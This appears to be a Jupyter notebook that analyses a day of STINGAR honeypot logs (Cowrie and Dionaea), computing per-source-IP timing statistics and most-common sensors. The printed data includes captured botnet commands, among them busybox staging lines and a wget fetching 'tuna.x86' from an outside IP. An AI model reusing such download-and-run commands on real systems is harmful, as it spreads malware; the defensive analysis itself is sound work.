In [1]:
import pandas as pd
import numpy as np
import statistics

def most_common(row):
    return max(set(row), key=row.count)

def get_seconds(row):
    return row.second

def sort_dt(row):
    return sorted(row)

def get_td_mean(row):
    td = 0
    if len(row) > 2:
        for i in range (0,len(row)-1):
            td += row[i+1]-row[i]
        return td/(len(row)-1)
    else:
        return 0
        
def get_td_sd(row):
    sd = 0
    new_list = []
    if len(row) > 2:
        for i in range (0,len(row)-1):
            new_list.append(row[i+1]-row[i])
        return statistics.stdev(new_list)
    else:
        return 0

In [2]:
data = pd.read_csv("Actual-Data/stingar_full-20190520.csv")
data

/anaconda3/lib/python3.6/site-packages/IPython/core/interactiveshell.py:3049: DtypeWarning: Columns (0,5,11,25) have mixed types. Specify dtype option on import or set low_memory=False.
  interactivity=interactivity, compiler=compiler, result=result)

,Unnamed: 0,app,command,data,dest_ip,dest_port,dionaea_action,direction,hash,ids_type,...,ssh_version,tags,timestamp,transport,type,url,username,vendor_product,d_time,d_time_window
0,0,cowrie,NaN,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.121451,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
1,1,cowrie,NaN,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.121690,tcp,cowrie.sessions,http://185.244.25.185:80/bins/tuna.x86,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
2,2,cowrie,NaN,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.121797,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
3,3,cowrie,enable,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.121854,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
4,4,cowrie,system,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.121906,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
5,5,cowrie,shell,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.121965,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
6,6,cowrie,sh,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122025,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
7,7,cowrie,>/tmp/.ptmx && cd /tmp/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122071,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
8,8,cowrie,>/var/.ptmx && cd /var/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122117,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
9,9,cowrie,>/dev/.ptmx && cd /dev/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122162,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
10,10,cowrie,>/mnt/.ptmx && cd /mnt/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122208,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
11,11,cowrie,>/var/run/.ptmx && cd /var/run/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122252,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
12,12,cowrie,>/var/tmp/.ptmx && cd /var/tmp/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122297,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
13,13,cowrie,>/.ptmx && cd /,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122352,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
14,14,cowrie,>/dev/netslink/.ptmx && cd /dev/netslink/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122402,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
15,15,cowrie,>/dev/shm/.ptmx && cd /dev/shm/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122449,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
16,16,cowrie,>/bin/.ptmx && cd /bin/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122494,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
17,17,cowrie,>/etc/.ptmx && cd /etc/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122562,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
18,18,cowrie,>/boot/.ptmx && cd /boot/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122698,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
19,19,cowrie,>/usr/.ptmx && cd /usr/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122769,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
20,20,cowrie,/bin/busybox rm -rf 19ju3d 902i13,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122818,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
21,21,cowrie,/bin/busybox cp /bin/busybox 19ju3d; >19ju3d; ...,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122863,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
22,22,cowrie,/bin/busybox cat /bin/busybox || while read i;...,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.122919,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
23,23,cowrie,/bin/busybox AK1K2,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.123003,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
24,24,cowrie,/bin/busybox wget; /bin/busybox tftp; /bin/bus...,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.123072,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
25,25,cowrie,/bin/busybox wget http://185.244.25.185:80/bin...,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.123122,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
26,26,cowrie,./19ju3d loader.wget; /bin/busybox O2J134,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.123171,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
27,27,cowrie,/bin/busybox rm -rf 902i13; >19ju3d; /bin/busy...,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.123218,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
28,28,cowrie,system,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.123264,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
29,29,cowrie,shell,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T05:03:50.123313,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 01:03:50,2019-05-20 01:00:00
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
1443575,1443489,cowrie,NaN,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.537716,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443576,1443490,cowrie,enable,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.537835,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443577,1443491,cowrie,system,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.537917,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443578,1443492,cowrie,shell,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538003,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443579,1443493,cowrie,sh,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538077,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443580,1443494,cowrie,>/tmp/.ptmx && cd /tmp/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538148,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443581,1443495,cowrie,>/var/.ptmx && cd /var/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538220,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443582,1443496,cowrie,>/dev/.ptmx && cd /dev/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538289,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443583,1443497,cowrie,>/mnt/.ptmx && cd /mnt/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538357,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443584,1443498,cowrie,>/var/run/.ptmx && cd /var/run/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538424,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443585,1443499,cowrie,>/var/tmp/.ptmx && cd /var/tmp/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538490,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443586,1443500,cowrie,>/.ptmx && cd /,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538565,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443587,1443501,cowrie,>/dev/netslink/.ptmx && cd /dev/netslink/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538668,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443588,1443502,cowrie,>/dev/shm/.ptmx && cd /dev/shm/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538739,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443589,1443503,cowrie,>/bin/.ptmx && cd /bin/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538807,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443590,1443504,cowrie,>/etc/.ptmx && cd /etc/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538883,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443591,1443505,cowrie,>/boot/.ptmx && cd /boot/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.538953,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443592,1443506,cowrie,>/usr/.ptmx && cd /usr/,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.539018,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443593,1443507,cowrie,/bin/busybox rm -rf wewrthe wererhwrHGWRGrvry,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.539086,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443594,1443508,cowrie,/bin/busybox cp /bin/busybox wewrthe; >wewrthe...,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.539152,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443595,1443509,cowrie,/bin/busybox cat /bin/busybox || while read i;...,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.539247,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443596,1443510,cowrie,/bin/busybox NAKAMA,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.539321,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443597,1443511,cowrie,system,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.539392,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443598,1443512,cowrie,shell,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.539459,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443599,1443513,cowrie,while read i,NaN,172.18.0.2,2223,NaN,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.539526,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443600,1443514,cowrie,NaN,NaN,172.18.0.2,2222,NaN,inbound,NaN,network,...,'SSH-2.0-Go',NaN,2019-05-20T12:20:41.539732,tcp,cowrie.sessions,NaN,NaN,Cowrie,2019-05-20 08:20:41,2019-05-20 08:20:00
1443601,1443515,dionaea,NaN,NaN,172.18.0.2,445,accept,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.545877,tcp,dionaea.connections,NaN,NaN,Dionaea,2019-05-20 08:20:41,2019-05-20 08:20:00
1443602,1443516,dionaea,NaN,NaN,172.19.0.2,445,accept,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.612694,tcp,dionaea.connections,NaN,NaN,Dionaea,2019-05-20 08:20:41,2019-05-20 08:20:00
1443603,1443517,dionaea,NaN,NaN,172.19.0.2,445,accept,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.649451,tcp,dionaea.connections,NaN,NaN,Dionaea,2019-05-20 08:20:41,2019-05-20 08:20:00
1443604,1443518,dionaea,NaN,NaN,172.18.0.2,445,accept,inbound,NaN,network,...,NaN,NaN,2019-05-20T12:20:41.757539,tcp,dionaea.connections,NaN,NaN,Dionaea,2019-05-20 08:20:41,2019-05-20 08:20:00

In [3]:
data.columns

Index(['Unnamed: 0', 'app', 'command', 'data', 'dest_ip', 'dest_port',
       'dionaea_action', 'direction', 'hash', 'ids_type', 'protocol',
       'request_url', 'sensor', 'severity', 'signature', 'src_ip', 'src_port',
       'ssh_password', 'ssh_username', 'ssh_version', 'tags', 'timestamp',
       'transport', 'type', 'url', 'username', 'vendor_product', 'd_time',
       'd_time_window'],
      dtype='object')

In [4]:
data.dtypes

Unnamed: 0         object
app                object
command            object
data               object
dest_ip            object
dest_port          object
dionaea_action     object
direction          object
hash               object
ids_type           object
protocol           object
request_url        object
sensor             object
severity           object
signature          object
src_ip             object
src_port          float64
ssh_password       object
ssh_username       object
ssh_version        object
tags               object
timestamp          object
transport          object
type               object
url                object
username           object
vendor_product     object
d_time             object
d_time_window      object
dtype: object

In [5]:
data['d_time'] = pd.to_datetime(data['d_time']).values.astype(np.int64)

In [6]:
data_grouped_td = data[['src_ip','d_time']].groupby('src_ip',as_index = False).agg({'d_time':lambda x: x.tolist()})
data_grouped_td['d_time'] = data_grouped_td['d_time'].apply(sort_dt)
data_grouped_td['d_time'] = data_grouped_td['d_time'].apply(get_td_mean)
data_grouped_td['d_time'] = pd.to_datetime(data_grouped_td['d_time'], unit='ns')
data_grouped_td['d_time'] = data_grouped_td['d_time'].apply(get_seconds)
data_grouped_td = data_grouped_td.rename({'d_time':'mean_time_difference'},axis = 1)
data_grouped_td

               src_ip  mean_time_difference
0         1.1.155.160                    41
1          1.1.174.78                    41
2          1.1.176.59                     0
3           1.1.202.4                    41
4           1.1.210.2                    42
5         1.1.218.253                    56
6         1.1.238.231                    41
7         1.10.137.15                     0
8        1.10.193.152                     9
9        1.10.199.196                    31
10        1.10.255.90                    41
11        1.100.134.2                     0
12       1.100.22.156                     0
13      1.109.145.112                     0
14        1.109.23.38                     0
15      1.119.140.226                     0
16      1.119.150.180                     6
17      1.129.110.113                    42
18      1.136.109.185                    41
19       1.158.42.147                     0
20       1.160.202.78                     2
21       1.160.209.47                    58
22       1.160.237.26                    43
23       1.160.75.193                    22
24      1.161.174.194                    41
25       1.161.184.77                    42
26      1.161.213.222                    42
27      1.161.240.208                    44
28        1.161.94.44                     2
29      1.162.171.118                     0
...               ...                   ...
17677   96.244.71.124                     0
17678  96.245.190.226                    46
17679    96.245.198.6                     0
17680    96.30.101.87                     0
17681    96.30.70.153                    41
17682    96.30.71.168                    31
17683     96.30.94.26                    12
17684    96.30.95.194                     0
17685    96.57.82.166                    35
17686   96.69.120.161                    10
17687    96.70.41.109                     0
17688     96.71.40.78                     0
17689   96.75.245.217                     0
17690   96.76.166.105                     3
17691   96.76.250.161                    15
17692     96.9.154.23                    52
17693    96.92.47.189                    10
17694   97.78.232.134                    10
17695   98.102.107.42                    41
17696    98.113.35.10                    16
17697   98.143.63.246                     0
17698   98.143.67.212                     0
17699   98.151.110.89                     0
17700   98.153.26.245                    57
17701  98.172.135.115                    41
17702  98.198.202.103                     0
17703   98.217.250.11                     0
17704      98.6.58.60                    42
17705    99.188.30.66                    44
17706     99.98.99.67                     0

[17707 rows x 2 columns]

In [17]:
data_grouped_sd = data[['src_ip','d_time']].groupby('src_ip',as_index = False).agg({'d_time':lambda x: x.tolist()})
data_grouped_sd['d_time'] = data_grouped_sd['d_time'].apply(sort_dt)
data_grouped_sd['d_time'] = data_grouped_sd['d_time'].apply(get_td_sd)
data_grouped_sd['d_time'] = pd.to_datetime(data_grouped_sd['d_time'], unit='ns')
data_grouped_sd['d_time'] = data_grouped_sd['d_time'].apply(get_seconds)
data_grouped_sd = data_grouped_sd.rename({'d_time':'sd_time_difference'},axis = 1)
data_grouped_sd

               src_ip  sd_time_difference
0         1.1.155.160                  11
1          1.1.174.78                  10
2          1.1.176.59                   0
3           1.1.202.4                  11
4           1.1.210.2                  11
5         1.1.218.253                  44
6         1.1.238.231                  11
7         1.10.137.15                   0
8        1.10.193.152                  31
9        1.10.199.196                  54
10        1.10.255.90                  11
11        1.100.134.2                   0
12       1.100.22.156                   0
13      1.109.145.112                   0
14        1.109.23.38                   0
15      1.119.140.226                   0
16      1.119.150.180                  13
17      1.129.110.113                  12
18      1.136.109.185                  11
19       1.158.42.147                   0
20       1.160.202.78                   3
21       1.160.209.47                   8
22       1.160.237.26                  11
23       1.160.75.193                  30
24      1.161.174.194                  11
25       1.161.184.77                  11
26      1.161.213.222                  11
27      1.161.240.208                  11
28        1.161.94.44                   3
29      1.162.171.118                   0
...               ...                 ...
17677   96.244.71.124                   0
17678  96.245.190.226                   4
17679    96.245.198.6                   0
17680    96.30.101.87                   0
17681    96.30.70.153                  11
17682    96.30.71.168                  11
17683     96.30.94.26                  17
17684    96.30.95.194                   0
17685    96.57.82.166                  55
17686   96.69.120.161                   0
17687    96.70.41.109                   0
17688     96.71.40.78                   0
17689   96.75.245.217                   0
17690   96.76.166.105                  38
17691   96.76.250.161                  53
17692     96.9.154.23                  40
17693    96.92.47.189                   0
17694   97.78.232.134                   0
17695   98.102.107.42                  11
17696    98.113.35.10                  31
17697   98.143.63.246                   0
17698   98.143.67.212                   0
17699   98.151.110.89                   0
17700   98.153.26.245                   6
17701  98.172.135.115                  10
17702  98.198.202.103                   0
17703   98.217.250.11                   0
17704      98.6.58.60                  11
17705    99.188.30.66                  24
17706     99.98.99.67                   0

[17707 rows x 2 columns]

In [7]:
data_grouped = data[['src_ip','d_time']].groupby('src_ip',as_index = False).agg({'d_time':np.mean})
data_grouped['d_time'] = pd.to_datetime(data_grouped['d_time'], unit='ns')
data_grouped

               src_ip                        d_time
0         1.1.155.160 2019-05-20 23:35:08.250000128
1          1.1.174.78 2019-05-20 17:17:52.750000128
2          1.1.176.59 2019-05-20 05:30:46.000000000
3           1.1.202.4 2019-05-20 03:31:45.500000256
4           1.1.210.2 2019-05-20 10:11:08.000000000
5         1.1.218.253 2019-05-20 22:34:46.666666752
6         1.1.238.231 2019-05-20 21:34:04.500000000
7         1.10.137.15 2019-05-20 19:31:02.000000000
8        1.10.193.152 2019-05-20 04:20:03.583333376
9        1.10.199.196 2019-05-20 21:29:14.400000000
10        1.10.255.90 2019-05-20 15:51:46.249999872
11        1.100.134.2 2019-05-20 20:42:37.000000000
12       1.100.22.156 2019-05-20 07:09:30.000000000
13      1.109.145.112 2019-05-20 12:45:12.000000000
14        1.109.23.38 2019-05-20 17:26:35.000000000
15      1.119.140.226 2019-05-20 00:52:16.599999744
16      1.119.150.180 2019-05-20 02:16:25.400000000
17      1.129.110.113 2019-05-20 21:57:12.499999744
18      1.136.109.185 2019-05-20 23:52:49.249999872
19       1.158.42.147 2019-05-20 17:53:09.000000000
20       1.160.202.78 2019-05-20 09:21:37.583333376
21       1.160.209.47 2019-05-20 09:17:21.000000000
22       1.160.237.26 2019-05-20 21:41:12.500000000
23       1.160.75.193 2019-05-20 19:11:49.000000256
24      1.161.174.194 2019-05-20 07:37:35.000000000
25       1.161.184.77 2019-05-20 00:31:36.500000000
26      1.161.213.222 2019-05-20 12:01:13.750000128
27      1.161.240.208 2019-05-20 07:48:01.750000128
28        1.161.94.44 2019-05-20 04:52:36.166666496
29      1.162.171.118 2019-05-20 14:03:57.000000000
...               ...                           ...
17677   96.244.71.124 2019-05-20 07:14:32.000000000
17678  96.245.190.226 2019-05-20 19:31:07.000000000
17679    96.245.198.6 2019-05-20 06:55:53.500000000
17680    96.30.101.87 2019-05-20 21:31:21.000000000
17681    96.30.70.153 2019-05-20 12:45:34.000000000
17682    96.30.71.168 2019-05-20 02:54:55.599999744
17683     96.30.94.26 2019-05-20 05:41:07.333333248
17684    96.30.95.194 2019-05-20 08:28:11.000000000
17685    96.57.82.166 2019-05-20 12:50:26.499999744
17686   96.69.120.161 2019-05-20 12:03:41.500000000
17687    96.70.41.109 2019-05-20 13:20:10.000000000
17688     96.71.40.78 2019-05-20 22:10:18.000000000
17689   96.75.245.217 2019-05-20 12:34:23.000000000
17690   96.76.166.105 2019-05-20 12:20:07.800000000
17691   96.76.250.161 2019-05-20 15:14:38.913043200
17692     96.9.154.23 2019-05-20 09:36:22.750000128
17693    96.92.47.189 2019-05-20 18:33:06.800000000
17694   97.78.232.134 2019-05-20 10:56:46.511110656
17695   98.102.107.42 2019-05-20 00:35:26.000000000
17696    98.113.35.10 2019-05-20 16:52:10.875000064
17697   98.143.63.246 2019-05-20 17:10:46.000000000
17698   98.143.67.212 2019-05-20 16:45:09.000000000
17699   98.151.110.89 2019-05-20 04:29:30.000000000
17700   98.153.26.245 2019-05-20 10:21:55.000000000
17701  98.172.135.115 2019-05-20 10:21:59.749999872
17702  98.198.202.103 2019-05-20 17:16:57.000000000
17703   98.217.250.11 2019-05-20 07:57:57.000000000
17704      98.6.58.60 2019-05-20 19:03:18.749999872
17705    99.188.30.66 2019-05-20 11:25:11.333333248
17706     99.98.99.67 2019-05-20 12:37:49.000000000

[17707 rows x 2 columns]

In [8]:
data_grouped1 = data[['src_ip','d_time']].groupby('src_ip',as_index = False).agg({'d_time':np.std})
data_grouped1['d_time'] = pd.to_datetime(data_grouped1['d_time'], unit='ns')
data_grouped1['d_time'] = data_grouped1['d_time'].apply(get_seconds)
data_grouped1

               src_ip  d_time
0         1.1.155.160    11.0
1          1.1.174.78    11.0
2          1.1.176.59     NaN
3           1.1.202.4    11.0
4           1.1.210.2    12.0
5         1.1.218.253    13.0
6         1.1.238.231    11.0
7         1.10.137.15     NaN
8        1.10.193.152    12.0
9        1.10.199.196    28.0
10        1.10.255.90    11.0
11        1.100.134.2     NaN
12       1.100.22.156     0.0
13      1.109.145.112     NaN
14        1.109.23.38     NaN
15      1.119.140.226     0.0
16      1.119.150.180    18.0
17      1.129.110.113    13.0
18      1.136.109.185    11.0
19       1.158.42.147     NaN
20       1.160.202.78     8.0
21       1.160.209.47    44.0
22       1.160.237.26    13.0
23       1.160.75.193    17.0
24      1.161.174.194    11.0
25       1.161.184.77    12.0
26      1.161.213.222    12.0
27      1.161.240.208    14.0
28        1.161.94.44     9.0
29      1.162.171.118     0.0
...               ...     ...
17677   96.244.71.124     NaN
17678  96.245.190.226     4.0
17679    96.245.198.6     2.0
17680    96.30.101.87     1.0
17681    96.30.70.153    11.0
17682    96.30.71.168    29.0
17683     96.30.94.26    14.0
17684    96.30.95.194     1.0
17685    96.57.82.166    55.0
17686   96.69.120.161    30.0
17687    96.70.41.109     NaN
17688     96.71.40.78     NaN
17689   96.75.245.217     0.0
17690   96.76.166.105     9.0
17691   96.76.250.161    26.0
17692     96.9.154.23    43.0
17693    96.92.47.189    31.0
17694   97.78.232.134    20.0
17695   98.102.107.42    11.0
17696    98.113.35.10    51.0
17697   98.143.63.246     NaN
17698   98.143.67.212     NaN
17699   98.151.110.89     0.0
17700   98.153.26.245    36.0
17701  98.172.135.115    11.0
17702  98.198.202.103     NaN
17703   98.217.250.11     NaN
17704      98.6.58.60    12.0
17705    99.188.30.66    48.0
17706     99.98.99.67     NaN

[17707 rows x 2 columns]

In [11]:
data_grouped2 = data[['sensor','src_ip']].groupby('src_ip',as_index = False).agg({'sensor':lambda x: x.tolist()})
data_grouped2['most_common_sensor'] = data_grouped2['sensor'].apply(most_common)
data_grouped2

,src_ip,sensor,most_common_sensor
0,1.1.155.160,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
1,1.1.174.78,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
2,1.1.176.59,[41e1395a-95c5-49a9-8b76-0028e2b0d114],41e1395a-95c5-49a9-8b76-0028e2b0d114
3,1.1.202.4,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
4,1.1.210.2,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91
5,1.1.218.253,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
6,1.1.238.231,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
7,1.10.137.15,[da366dbc-3c72-4927-bfc6-73850379ccb0],da366dbc-3c72-4927-bfc6-73850379ccb0
8,1.10.193.152,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
9,1.10.199.196,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa
10,1.10.255.90,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4
